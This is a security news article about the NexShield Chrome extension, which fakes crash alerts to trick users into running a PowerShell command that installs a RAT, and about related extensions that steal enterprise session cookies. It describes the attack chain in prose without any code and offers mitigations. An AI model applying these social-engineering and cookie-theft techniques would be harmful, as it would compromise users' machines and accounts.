Chrome Extension Backdoor Disguised as Fake Crash Alerts
▼ Summary
– Browser extensions are a high-risk enterprise attack vector, as demonstrated by the malicious NexShield extension which delivered a remote access trojan (RAT) to corporate machines.
– The NexShield extension, a clone of uBlock Origin Lite, used social engineering to trick users into executing a malicious PowerShell command by displaying a fake security pop-up after crashing their browser.
– The attack specifically targeted domain-joined corporate machines to enable lateral movement and access to sensitive data, downloading the persistent ModeloRAT after system checks.
– Separate malicious extensions targeting enterprise HR and ERP platforms were found stealing authentication cookies, hijacking sessions, and blocking access to security administration pages.
– Enterprise admins can mitigate these risks by using extension allowlists, disabling Developer Mode, and monitoring installed extensions for malicious updates.
Browser extensions represent a significant and often underestimated security threat for businesses, providing a direct pathway for attackers to circumvent standard defenses and establish control over corporate devices. A recent incident involving a malicious extension called NexShield demonstrates how a single installation from an official store can lead to complete system compromise. Security analysts at Huntress discovered that this extension deploys a previously unknown Windows remote access trojan, specifically targeting domain-joined computers. These machines are critical corporate assets with access to internal networks, sensitive data, and directory services.
The attack began when users searching for an ad blocker were directed via Google Search to a convincing download page. The page fraudulently presented the “NexShield Smart Ad Blocker” as a product from Raymond Hill, the actual creator of the reputable uBlock Origin. Victims were then sent to the Chrome Web Store to install the extension, which has since been taken down. Researchers found the NexShield extension is almost a perfect copy of uBlock Origin Lite, but modified to monitor installation events and hide its malicious activity by waiting an hour before executing.
The extension’s core deception involves crashing the browser. It floods the application with requests, causing it to freeze. When the user force-quits and restarts the browser, NexShield displays a counterfeit security alert labeled “CrashFix.” This pop-up instructs the user to run a scan. Following this, a fake “Security issues detected” message appears, guiding the victim to manually fix the problem. The instructions say to open the Windows Run dialog, paste from the clipboard, and press Enter. The malicious extension has silently copied a harmful PowerShell command to the clipboard, disguised as a legitimate repair script. Executing this command unknowingly initiates the attack.
If the pop-up is dismissed without removing the extension, the cycle repeats every ten minutes, persistently denying service until the user either succumbs to the social engineering or deletes the add-on. The initial PowerShell script downloads a legitimate Windows tool called `finger.exe`, which the attackers use to gather system information and fetch additional payloads. Further scripts check for security analysis tools, virtual machine indicators, and determine if the computer is part of a corporate domain. If it is domain-joined, the script proceeds to download a Python environment and the persistent ModeloRAT malware. This selective targeting indicates the threat actor’s focus on enterprise environments, where one compromised host can enable lateral movement, credential theft, and access to high-value assets.
In a separate but related threat, analysts at Socket identified five additional malicious Chrome extensions aimed at enterprise platforms. These extensions, named DataByCloud 1, DataByCloud 2, DataByCloud Access, Software Access, and Tool Access 11, posed as productivity tools for major HR and ERP systems like Workday, NetSuite, and SAP SuccessFactors. Available on the Chrome Web Store and installed by over 2,300 users, they shared code and targeting patterns, pointing to a coordinated campaign. These extensions constantly steal authentication cookies, sending them to remote servers, allowing attackers to hijack user sessions and take over accounts. They also deliberately block access to security administration pages, preventing users from changing passwords, managing two-factor authentication, or adjusting security policies.
This creates a severe containment problem. Security teams might detect suspicious activity through alerts or user reports, but standard remediation steps are blocked. Organizations are then forced to choose between allowing continued unauthorized access or undertaking the disruptive process of migrating affected users to entirely new accounts outside the compromised environment.
For enterprise administrators, mitigating these risks requires a layered approach combining technical controls, strict policies, and vigilant monitoring. Key steps include preventing employees from downloading unapproved extensions by using strict allowlists and conducting thorough reviews before any extension is approved. Disabling Developer Mode in browsers stops users from loading unpacked or sideloaded extensions. It is also crucial to continuously monitor installed extensions, as even approved ones can become malicious after an update. Staying informed through reliable security alerts is essential for responding swiftly to emerging threats.
(Source: HelpNet Security)
